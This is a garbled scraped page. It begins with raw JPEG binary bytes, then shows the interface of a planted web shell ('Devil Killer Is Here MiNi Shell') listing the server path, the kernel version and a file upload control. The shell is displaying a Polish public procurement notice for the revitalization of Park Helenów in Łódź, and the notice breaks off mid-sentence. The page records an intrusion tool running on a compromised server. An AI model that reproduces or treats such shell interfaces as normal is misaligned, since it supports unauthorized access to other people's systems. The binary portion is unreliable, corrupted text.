JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211029/0025149903-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Projekt „OdNowa Parku Helenów” Rewitalizacja Parku Helenów polegająca na zmianie sposobu zagospodarowania terenu, budowie małej architektury, a także przebudowie(…)części budynku usługowego(…) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Łódź - Zarząd Inwestycji Miejskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 364429563</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piotrkowska 175</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-447</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zim.uml.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zim.lodz.bip-e.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Projekt „OdNowa Parku Helenów” Rewitalizacja Parku Helenów polegająca na zmianie sposobu zagospodarowania terenu, budowie małej architektury, a także przebudowie(…)części budynku usługowego(…) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-511c6f69-3880-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00251499</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002444/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.33 Zmiana sposobu zagospodarowania terenu, budowa małej architektury, a także przebudowa, (...) wraz z budową niezbędnej infrastruktury technicznej oraz wykonaniu rozbiórek dla Parku Helenów w Łodzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „OdNowa Parku Helenów” WND-RPLD.06.02.02-10-0001/19 Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zim.lodz.bip-e.pl/zim/zamowienia-publiczne/12338,Projekt-OdNowa-Parku-Helenow-Rewitalizacja-Parku-Helenow-polegajaca----na-zmiani.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu MiniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej zamowienia@zim.uml.lodz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Dokumenty elektroniczne składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 Rozporządzenia Ogólnego o Ochronie Danych Osobowych (RODO) związana z postępowaniem o udzielenie zamówienia<br/>publicznego.<br/>1) Administratorem danych osobowych jest Zarząd Inwestycji Miejskich, siedziba, Łódź ul. Piotrkowska 175, tel. 42 272 62 80, e-mail: zim@zim.uml.lodz.pl, reprezentowany przez Dyrektora Zarządu<br/>Inwestycji Miejskich.<br/>2) W sprawach ochrony danych osobowych można się kontaktować z Inspektorem ochrony danych: email: iod@zim.uml.lodz.pl. Dane dotyczące inspektora podane są na stronie internetowej: zim.lodz.bip-e.pl.<br/>3) Przetwarzanie danych osobowych odbywa się w związku z pełnieniem przez Dyrektora Zarządu Inwestycji Miejskich obowiązków kierownika zamawiającego w postępowaniach o udzielenie zamówienia publicznego na rzecz Miasta Łodzi w związku z realizacją zadań powierzonych jednostce na podstawie zarządzenia Nr 570/VIII/19 Prezydenta Miasta Łodzi z dnia 18 lutego 2019 r. w sprawie powierzenia Zarządowi Inwestycji Miejskich realizacji zadań inwestycyjnych oraz udzielenia pełnomocnictwa do reprezentowania Miasta<br/>Łodzi jako inwestora zadań inwestycyjnych ze zm. w związku z § 3 statutu Zarządu Inwestycji Miejskich stanowiącego załącznik do uchwały Nr XXVI/650/16 Rady Miejskiej w Łodzi z dnia 9 marca 2016 r. w<br/>sprawie utworzenia i nadania statutu dla jednostki budżetowej o nazwie Zarząd Inwestycji Miejskich (Dz. Urz. Woj. Łódzkiego poz. 1431 ze zm.), w tym między innymi niniejszego postępowania (...) Ciąg dalszy w SWZ, rozdział IV ust. 19 pkt 4 i następne.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZIM-DZ.2621.19.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem niniejszego zamówienia jest wykonanie zamówienia pn.: „Projekt „OdNowa Parku Helenów” Rewitalizacja Parku Helenów polegająca na zmianie sposobu zagospodarowania terenu, budowie małej architektury, a także przebudowie, rozbudowie i zmianie sposobu użytkowania części budynku usługowego wraz z towarzyszącymi urządzeniami budowlanymi wraz z budową niezbędnej infrastruktury technicznej oraz wykonaniem rozbiórek w systemie „zaprojektuj i wybuduj”<br/>3.2. Zadanie inwestycyjne polega na zmianie sposobu zagospodarowania terenu, budowie małej architektury, a także przebudowie, rozbudowie i zmianie sposobu użytkowania części budynku usługowego wraz z rozbudową niezbędnej infrastruktury technicznej oraz wykonaniu rozbiórek na obszarze Parku Helenów w Łodzi.<br/>Przedmiot opracowania znajduje się pomiędzy ulicami: Północną, Źródłową i Smugową.<br/>Zakres obszarowy opracowania obejmuje działki nr 172, 173/2, 173/5, 174, 176/1, 177/1, 178, 179/5, 179[AP1]/8, 179/9, 180/3, 179/11, 182, część działki 183/3, obręb B-48, Łódź – Bałuty. Zakres określony jest graficznie na załączonym rysunku Planu Zagospodarowania Terenu, stanowiącym część załączonej Koncepcji. Funkcjonalnie teren ten obejmuje Park Helenów w Łodzi oraz budynek przy ul. Północnej 36/36A, z którego część pozostaje bez zmian, natomiast część jest planowana do adaptacji ( przebudowa ). Z obszaru wyłączona jest działka nr 181.<br/>Przedmiotem zamówienia jest:<br/>•	Wykonanie dokumentacji technicznej budowlano – konserwatorskiej, projektowo – kosztorysowej, Realizacja robót budowlanych polegających na wykonaniu elementów zagospodarowania Parku Helenów oraz przebudowie i adaptacji części budynku dawnej restauracji, w tym uzyskanie decyzji, zgód, uzgodnień i opinii wymaganych prawnie do realizacji Zadanie 1 (zamówienie podstawowe)<br/>Przebudowa, rozbudowa i zmiana sposobu użytkowania części budynku usługowego wraz z rozbudową niezbędnej infrastruktury technicznej<br/><br/>Zadanie 2 (zamówienie podstawowe)<br/>Zmiana sposobu zagospodarowania terenu, budowa małej architektury<br/><br/>Zadanie 3 <br/>Wykonanie ścieżki na wodzie oraz siedzisk na skarpie<br/>(w przypadku skorzystania przez Zamawiającego z prawa opcji w zakresie Zadania 3)<br/><br/>Zakres robót obejmuje m.in.:<br/><br/>W zakresie Zadania 1 (zamówienie podstawowe)<br/>• Zabezpieczenie terenu budowy<br/>•	Rozbiórka dobudówek gospodarczych – parterowych<br/>•	Rozbiórka elementów stanu zerowego i surowego<br/>•	Rozbiórka pokrycia i częściowo konstrukcji<br/>•	Rozbiórka instalacji<br/>•	Rozbiórka elementów wykończeniowych<br/>•	Rozbiórka nawierzchni dojść do budynku<br/>•	Rozbiórka nawierzchni parkingu z płyt betonowych ażurowych<br/>•	Rozbiórka nawierzchni bitumicznej parkingu wraz z podbudową dla ruchu lekkiego<br/>•	Rozbiórka nawierzchni dojścia zapleczowego od str. płn-zach. budynku<br/>•	Osuszanie fundamentów i wykonanie izolacji poziomej metodą termoiniekcji, wykonanie izolacji pionowej fundamentów<br/>•	Częściowa wymiana konstrukcji drewnianej dachu oraz wykonanie nowego pokrycia dachu <br/>wraz z obróbkami i orynnowaniem<br/>•	Zabezpieczenie istniejącej konstrukcji drewnianej<br/>•	Ocieplenie ścian i wykonanie elewacji<br/>•	Wymiana okien oraz drzwi zewnętrznych<br/>•	Prace konserwatorskie na elewacji – snycerka<br/>•	Wykonanie schodów i tarasów zewnętrznych drewnianych<br/>•	Modernizacja, przebudowa lub wykonanie przyłączy i instalacji wod-kan., grzewczej, wentylacji mechanicznej, chłodzenia oraz kanalizacji deszczowej<br/>•	Modernizacja, przebudowa lub wykonanie przyłączy i instalacji elektrycznych<br/>•	Oświetlenie dodatkowe wewnętrzne<br/>•	Oświetlenie zewnętrzne i iluminacja<br/>•	Instalacje teletechniczne oraz instalacja odgromowa<br/>•	Wykonanie ścian działowych w systemie g-k, o podwyższonych parametrach, tynków, sufitów akustycznych gładkich<br/>•	Wykonanie prac konserwatorskich i odtworzeniowych<br/>•	Wykonanie posadzek i stolarki wewnętrznej<br/>•	Wykonanie zabudowy ciągów kuchennych oraz szafkowej<br/>•	Wykonanie systemu ekspozycyjno-linkowego oraz innych elementów wykończeniowych<br/>•	Wykonanie budowy werandy<br/>•	Wykonanie dojścia <br/>•	Wykonanie nawierzchni parkingu, z odwodnieniem<br/>• Zakup i montaż energooszczędnych opraw iluminacyjnych najazdowych z podłączeniem i rozprowadzeniem instalacji<br/>•	Zakup i montaż nowych latarni z wykonaniem instalacji zasilającej, źr. LED<br/>•	Wykonanie placyku składowania odpadów – nawierzchnia z płyt betonowych na ruszcie<br/>•	Wykonanie placu składowania odpadów – przepierzenia ażurowe, stalowe<br/>•	Naprawa schodów terenowych<br/>•	Zakup i montaż wyposażenia t.j. projektor LCD, most oświetleniowy, reflektor sceniczny LED, ekran sceniczny rozwijany automatycznie, zasłony na okna zacieniające przestrzeń prezentacji, gablota ekspozycyjna, stojak na ulotki, itp.<br/><br/>W zakresie Zadania 2 (zamówienie podstawowe)<br/>•	budowa ścieżek na potrzeby utworzenia szlaku turystycznego wraz z pracami towarzyszącymi<br/>- rozbiórka chodników – nawierzchnie z płyt betonowych<br/>- rozbiórka schodów terenowych przy KS SPOŁEM<br/>- rozbiórka pawilonu<br/>- demontaż ławek<br/>- wykonanie alejek pieszo-rowerowych <br/>- wykonanie alejek pieszych <br/>- wykonanie pochylni, podbudowa, pochwyty<br/>- wykonanie schodów z betonu dekoracyjnego z pochwytami<br/>- naprawa nawierzchni glinkowo – żwirowych, odwodnienia liniowe drewniane<br/>- zakup i montaż tablic edukacyjnych z elementami multimedialnymi<br/>- wykonanie/zakup i montaż tablic edukacyjnych<br/>- wykonanie/zakup i montaż ławek<br/>- wykonanie/zakup i montaż siedzisk jednoosobowych<br/>- konserwacja latarni, wymiana źr. światła<br/>- wykonanie/zakup nowych latarni z wykonaniem instalacji zasilającej, źr. LED<br/>- montaż energooszczędnych opraw iluminacyjnych najazdowych z podłączeniem <br/>i rozprowadzeniem instalacji<br/>- nasadzenie zieleni niskiej i wysokiej oraz ich pielęgnacja w okresie 24 miesięcy od zakończenia robót.<br/><br/>•	budowa „ Ogrodu Kultury” wraz z pracami towarzyszącymi<br/>- wykonanie dojazdu z alei głównej o nawierzchni gliniasto – żwirowej<br/>- wykonanie/zakup i montaż siedzisk wieloosobowych nietypowych „liście”<br/>- wykonanie/zakup i montaż słupa ogłoszeniowego<br/>- przebudowa przyłącza elektrycznego fontann<br/>- wykonanie dwóch studzienek instalacyjnych<br/>- wykonanie oświetlenia : girlandy świetlne, ze źr. światła<br/>- wykonanie oświetlenia: słupy demontowalne, gniazda, instalacja elektryczna podziemna<br/>- montaż energooszczędnych opraw iluminacyjnych najazdowych z podłączeniem <br/>i rozprowadzeniem instalacji<br/>- nasadzenie zieleni niskiej i wysokiej oraz ich pielęgnacja w okresie 24 miesięcy od zakończenia robót.<br/><br/>UWAGA: Nasadzona zieleń wysoka i niska jest objęta 24 -ro miesięczną gwarancją <br/>od daty zakończenia robót i jest wyłączona z gwarancji wykonanych robót budowlanych. <br/><br/>W zakresie Zadania 3 (w przypadku skorzystania przez Zamawiającego z prawa opcji w zakresie Zadania 3):<br/>•	Wykonanie ścieżki na wodzie <br/>- wypłycenie dna stawu<br/>- ułożenie kamieni płaskich do chodzenia<br/>•	Wykonanie na skarpie siedzisk z betonu dekoracyjnego i drewna<br/><br/>Zamawiający zastrzega możliwość zlecenia Zadania nr 3 w ramach prawa opcji <br/>i za wynagrodzeniem wskazanym w ofercie Wykonawcy:<br/>- maksymalna wartość dla Zadania nr 3 – wykonanie ścieżki na wodzie oraz siedzisk na skarpie – wynosi 3% całkowitego wynagrodzenia wskazanego w ofercie z tytułu realizacji przedmiotu umowy w zakresie podstawowym bez uwzględniania prawa opcji.<br/><br/>Warunkiem skorzystania przez Zamawiającego z prawa opcji w zakresie Zadania nr 3 jest pozyskanie niezbędnych środków finansowych budżetowych umożliwiających realizację przedmiotu zamówienia w zakresie objętym prawem opcji.<br/><br/>Z prawa opcji Zamawiający może skorzystać w terminie do 6 miesięcy od dnia zawarcia umowy o udzielenie zamówienia składając pisemne oświadczenie Wykonawcy w tym przedmiocie we wskazanym terminie. W przypadku nieskorzystania z prawa opcji przez Zamawiającego Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>Wykonawca zobowiązany jest zrealizować zakres robót określonych w prawie opcji dla Zadania nr 3 najpóźniej w Terminie Zakończenia zamówienia podstawowego ( Zadanie nr 1 i Zadanie nr 2). W przypadku podjęcia prac w zakresie Zadania nr 3 Zamawiający oczekuje że realizacja prac dla wszystkich trzech zadań zostanie skoordynowana.<br/><br/>3.3. Zamawiający informuje, iż podpisał umowę o dofinansowanie ww. inwestycji ze środków UE:<br/>Projekt pn.: „Od:Nowa Parku Helenów” w ramach dofinansowania na podstawie Uchwały podjętej przez Instytucję Zarządzającą w dniu 14 stycznia 2020 roku nr 19/20 w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014 – 2020, umowa o dofinansowanie projektu Nr UDA-RPLD.06.02.02-10-0001/19-00. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32323500-8 - Urządzenia do nadzoru wideo</p> <p class="mb-0">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45112711-2 - Roboty w zakresie kształtowania parków</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45212000-6 - Roboty budowlane w zakresie budowy wypoczynkowych, sportowych, kulturalnych, hotelowych i restauracyjnych obiektów budowlanych</p> <p class="mb-0">45220000-5 - Roboty inżynieryjne i budowlane</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45340000-2 - Instalowanie ogrodzeń, płotów i sprzętu ochronnego</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45454000-4 - Roboty restrukturyzacyjne</p> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71210000-3 - Doradcze usługi architektoniczne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71250000-5 - Usługi architektoniczne, inżynieryjne i pomiarowe</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71315000-9 - Usługi budowlane</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71332000-4 - Geotechniczne usługi inżynieryjne</p> <p class="mb-0">71351000-3 - Usługi planowania geologicznego, geofizycznego i inne usługi naukowe</p> <p class="mb-0">71400000-2 - Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu</p> <p class="mb-0">71420000-8 - Architektoniczne usługi zagospodarowania terenu</p> <p class="mb-0">71500000-3 - Usługi związane z budownictwem</p> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71541000-2 - Usługi zarządzania projektem budowlanym</p> <p class="mb-0">77300000-3 - Usługi ogrodnicze</p> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W zakresie Zadania 3 (w przypadku skorzystania przez Zamawiającego z prawa opcji w zakresie Zadania 3):<br/>•	Wykonanie ścieżki na wodzie <br/>- wypłycenie dna stawu<br/>- ułożenie kamieni płaskich do chodzenia<br/>•	Wykonanie na skarpie siedzisk z betonu dekoracyjnego i drewna<br/><br/>Zamawiający zastrzega możliwość zlecenia Zadania nr 3 w ramach prawa opcji <br/>i za wynagrodzeniem wskazanym w ofercie Wykonawcy:<br/>- maksymalna wartość dla Zadania nr 3 – wykonanie ścieżki na wodzie oraz siedzisk na skarpie – wynosi 3% całkowitego wynagrodzenia wskazanego w ofercie z tytułu realizacji przedmiotu umowy w zakresie podstawowym bez uwzględniania prawa opcji.<br/><br/>Warunkiem skorzystania przez Zamawiającego z prawa opcji w zakresie Zadania nr 3 jest pozyskanie niezbędnych środków finansowych budżetowych umożliwiających realizację przedmiotu zamówienia w zakresie objętym prawem opcji.<br/><br/>Z prawa opcji Zamawiający może skorzystać w terminie do 6 miesięcy od dnia zawarcia umowy o udzielenie 